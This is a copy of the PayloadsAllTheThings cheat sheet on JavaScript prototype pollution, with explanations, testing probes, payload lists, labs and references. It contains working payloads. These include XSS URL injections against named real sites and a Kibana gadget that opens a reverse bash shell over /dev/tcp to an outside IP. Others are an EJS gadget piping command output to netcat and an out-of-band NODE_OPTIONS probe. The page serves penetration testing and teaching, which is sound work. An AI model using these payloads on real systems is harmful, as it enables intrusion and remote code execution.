index.md (10517B)
1 --- 2 title: "Prototype Pollution" 3 topic: "Prototype Pollution" 4 topicSlug: "prototype-pollution" 5 sourcePath: "Prototype Pollution/README.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Prototype%20Pollution/README.md" 7 sha: "3ac27901c711" 8 isReadme: true 9 --- 10 11 # Prototype Pollution 12 13 > Prototype pollution is a type of vulnerability that occurs in JavaScript when properties of Object.prototype are modified. This is particularly risky because JavaScript objects are dynamic and we can add properties to them at any time. Also, almost all objects in JavaScript inherit from Object.prototype, making it a potential attack vector. 14 15 ## Summary 16 17 * [Tools](#tools) 18 * [Methodology](#methodology) 19 * [Examples](#examples) 20 * [Manual Testing](#manual-testing) 21 * [Prototype Pollution via JSON Input](#prototype-pollution-via-json-input) 22 * [Prototype Pollution in URL](#prototype-pollution-in-url) 23 * [Prototype Pollution Payloads](#prototype-pollution-payloads) 24 * [Prototype Pollution Gadgets](#prototype-pollution-gadgets) 25 * [Labs](#labs) 26 * [References](#references) 27 28 ## Tools 29 30 * [yeswehack/pp-finder](https://github.com/yeswehack/pp-finder) - Help you find gadget for prototype pollution exploitation 31 * [yuske/silent-spring](https://github.com/yuske/silent-spring) - Prototype Pollution Leads to Remote Code Execution in Node.js 32 * [yuske/server-side-prototype-pollution](https://github.com/yuske/server-side-prototype-pollution) - Server-Side Prototype Pollution gadgets in Node.js core code and 3rd party NPM packages 33 * [BlackFan/client-side-prototype-pollution](https://github.com/BlackFan/client-side-prototype-pollution) - Prototype Pollution and useful Script Gadgets 34 * [portswigger/server-side-prototype-pollution](https://github.com/portswigger/server-side-prototype-pollution) - Burp Suite Extension detectiong Prototype Pollution vulnerabilities 35 * [msrkp/PPScan](https://github.com/msrkp/PPScan) - Client Side Prototype Pollution Scanner 36 37 ## Methodology 38 39 In JavaScript, prototypes are what allow objects to inherit features from other objects. If an attacker is able to add or modify properties of `Object.prototype`, they can essentially affect all objects that inherit from that prototype, potentially leading to various kinds of security risks. 40 41 ```js 42 var myDog = new Dog(); 43 ``` 44 45 ```js 46 // Points to the function "Dog" 47 myDog.constructor; 48 ``` 49 50 ```js 51 // Points to the class definition of "Dog" 52 myDog.constructor.prototype; 53 myDog.__proto__; 54 myDog["__proto__"]; 55 ``` 56 57 ### Examples 58 59 * Imagine that an application uses an object to maintain configuration settings, like this: 60 61 ```js 62 let config = { 63 isAdmin: false 64 }; 65 ``` 66 67 * An attacker might be able to add an `isAdmin` property to `Object.prototype`, like this: 68 69 ```js 70 Object.prototype.isAdmin = true; 71 ``` 72 73 ### Manual Testing 74 75 * ExpressJS: `{ "__proto__":{"parameterLimit":1}}` + 2 parameters in GET request, at least 1 must be reflected in the response. 76 * ExpressJS: `{ "__proto__":{"ignoreQueryPrefix":true}}` + `??foo=bar` 77 * ExpressJS: `{ "__proto__":{"allowDots":true}}` + `?foo.bar=baz` 78 * Change the padding of a JSON response: `{ "__proto__":{"json spaces":" "}}` + `{"foo":"bar"}`, the server should return `{"foo": "bar"}` 79 * Modify CORS header responses: `{ "__proto__":{"exposedHeaders":["foo"]}}`, the server should return the header `Access-Control-Expose-Headers`. 80 * Change the status code: `{ "__proto__":{"status":510}}` 81 82 ### Prototype Pollution via JSON Input 83 84 You can access the prototype of any object via the magic property `__proto__`. 85 The `JSON.parse()` function in JavaScript is used to parse a JSON string and convert it into a JavaScript object. Typically it is a sink function where prototype pollution can happen. 86 87 ```js 88 { 89 "__proto__": { 90 "evilProperty": "evilPayload" 91 } 92 } 93 ``` 94 95 Asynchronous payload for NodeJS. 96 97 ```js 98 { 99 "__proto__": { 100 "argv0":"node", 101 "shell":"node", 102 "NODE_OPTIONS":"--inspect=payload\"\".oastify\"\".com" 103 } 104 } 105 ``` 106 107 Polluting the prototype via the `constructor` property instead. 108 109 ```js 110 { 111 "constructor": { 112 "prototype": { 113 "foo": "bar", 114 "json spaces": 10 115 } 116 } 117 } 118 ``` 119 120 ### Prototype Pollution in URL 121 122 Example of Prototype Pollution payloads found in the wild. 123 124 ```ps1 125 https://victim.com/#a=b&__proto__[admin]=1 126 https://example.com/#__proto__[xxx]=alert(1) 127 http://server/servicedesk/customer/user/signup?__proto__.preventDefault.__proto__.handleObj.__proto__.delegateTarget=%3Cimg/src/onerror=alert(1)%3E 128 https://www.apple.com/shop/buy-watch/apple-watch?__proto__[src]=image&__proto__[onerror]=alert(1) 129 https://www.apple.com/shop/buy-watch/apple-watch?a[constructor][prototype]=image&a[constructor][prototype][onerror]=alert(1) 130 ``` 131 132 ### Prototype Pollution Exploitation 133 134 Depending if the prototype pollution is executed client (CSPP) or server side (SSPP), the impact will vary. 135 136 * Remote Command Execution: [RCE in Kibana (CVE-2019-7609)](https://web.archive.org/web/20191031042307/https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/) 137 138 ```js 139 .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//') 140 .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ') 141 ``` 142 143 * Remote Command Execution: [RCE using EJS gadgets](https://web.archive.org/web/20230309172121/https://mizu.re/post/ejs-server-side-prototype-pollution-gadgets-to-rce) 144 145 ```js 146 { 147 "__proto__": { 148 "client": 1, 149 "escapeFunction": "JSON.stringify; process.mainModule.require('child_process').exec('id | nc localhost 4444')" 150 } 151 } 152 ``` 153 154 * Reflected XSS: [Reflected XSS on www.hackerone.com via Wistia embed code - #986386](https://web.archive.org/web/20200928082422/https://hackerone.com/reports/986386) 155 * Client-side bypass: [Prototype pollution – and bypassing client-side HTML sanitizers](https://web.archive.org/web/20200908002825/https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) 156 * Denial of Service 157 158 ### Prototype Pollution Payloads 159 160 ```js 161 Object.__proto__["evilProperty"]="evilPayload" 162 Object.__proto__.evilProperty="evilPayload" 163 Object.constructor.prototype.evilProperty="evilPayload" 164 Object.constructor["prototype"]["evilProperty"]="evilPayload" 165 {"__proto__": {"evilProperty": "evilPayload"}} 166 {"__proto__.name":"test"} 167 x[__proto__][abaeead] = abaeead 168 x.__proto__.edcbcab = edcbcab 169 __proto__[eedffcb] = eedffcb 170 __proto__.baaebfc = baaebfc 171 ?__proto__[test]=test 172 ``` 173 174 ### Prototype Pollution Gadgets 175 176 A "gadget" in the context of vulnerabilities typically refers to a piece of code or functionality that can be exploited or leveraged during an attack. When we talk about a "prototype pollution gadget," we're referring to a specific code path, function, or feature of an application that is susceptible to or can be exploited through a prototype pollution attack. 177 178 Either create your own gadget using part of the source with [yeswehack/pp-finder](https://github.com/yeswehack/pp-finder), or try to use already discovered gadgets [yuske/server-side-prototype-pollution](https://github.com/yuske/server-side-prototype-pollution) / [BlackFan/client-side-prototype-pollution](https://github.com/BlackFan/client-side-prototype-pollution). 179 180 ## Labs 181 182 * [YesWeHack Dojo - Prototype Pollution](https://dojo-yeswehack.com/XSS/Training/Prototype-Pollution) 183 * [PortSwigger - Prototype Pollution](https://portswigger.net/web-security/all-labs#prototype-pollution) 184 185 ## References 186 187 * [A Pentester's Guide to Prototype Pollution Attacks - Harsh Bothra - January 2, 2023](https://web.archive.org/web/20260111201021/https://www.cobalt.io/blog/a-pentesters-guide-to-prototype-pollution-attacks) 188 * [A tale of making internet pollution free - Exploiting Client-Side Prototype Pollution in the wild - s1r1us - September 28, 2021](https://web.archive.org/web/20260204200448/https://blog.s1r1us.ninja/research/PP) 189 * [Detecting Server-Side Prototype Pollution - Daniel Thatcher - February 15, 2023](https://web.archive.org/web/20230221012320/https://www.intruder.io/research/server-side-prototype-pollution) 190 * [Exploiting prototype pollution – RCE in Kibana (CVE-2019-7609) - Michał Bentkowski - October 30, 2019](https://web.archive.org/web/20250810040511/https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/) 191 * [Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes - March 27, 2023](https://web.archive.org/web/20230327103116/https://youtu.be/LD-KcuKM_0M) 192 * [NodeJS - \_\_proto\_\_ & prototype Pollution - HackTricks - July 19, 2024](https://web.archive.org/web/20241224163723/https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution) 193 * [Prototype Pollution - PortSwigger - November 10, 2022](https://web.archive.org/web/20221110144930/https://portswigger.net/web-security/prototype-pollution) 194 * [Prototype pollution - Snyk - August 19, 2023](https://web.archive.org/web/20211010192146/https://learn.snyk.io/lessons/prototype-pollution/javascript/) 195 * [Prototype pollution and bypassing client-side HTML sanitizers - Michał Bentkowski - August 18, 2020](https://web.archive.org/web/20200908002825/https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) 196 * [Prototype Pollution and Where to Find Them - BitK & SakiiR - August 14, 2023](https://youtu.be/mwpH9DF_RDA) 197 * [Prototype Pollution Attacks in NodeJS - Olivier Arteau - May 16, 2018](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf) 198 * [Prototype Pollution Attacks in NodeJS applications - Olivier Arteau - October 3, 2018](https://web.archive.org/web/20190218093454/https://youtu.be/LUsiFV3dsK8) 199 * [Prototype Pollution Leads to RCE: Gadgets Everywhere - Mikhail Shcherbakov - September 29, 2023](https://web.archive.org/web/20240416043553/https://youtu.be/v5dq80S1WF4) 200 * [Server side prototype pollution, how to detect and exploit - BitK - February 18, 2023](http://web.archive.org/web/20230218081534/https://blog.yeswehack.com/talent-development/server-side-prototype-pollution-how-to-detect-and-exploit/) 201 * [Server-side prototype pollution: Black-box detection without the DoS - Gareth Heyes - February 15, 2023](https://web.archive.org/web/20260219234352/https://portswigger.net/research/server-side-prototype-pollution)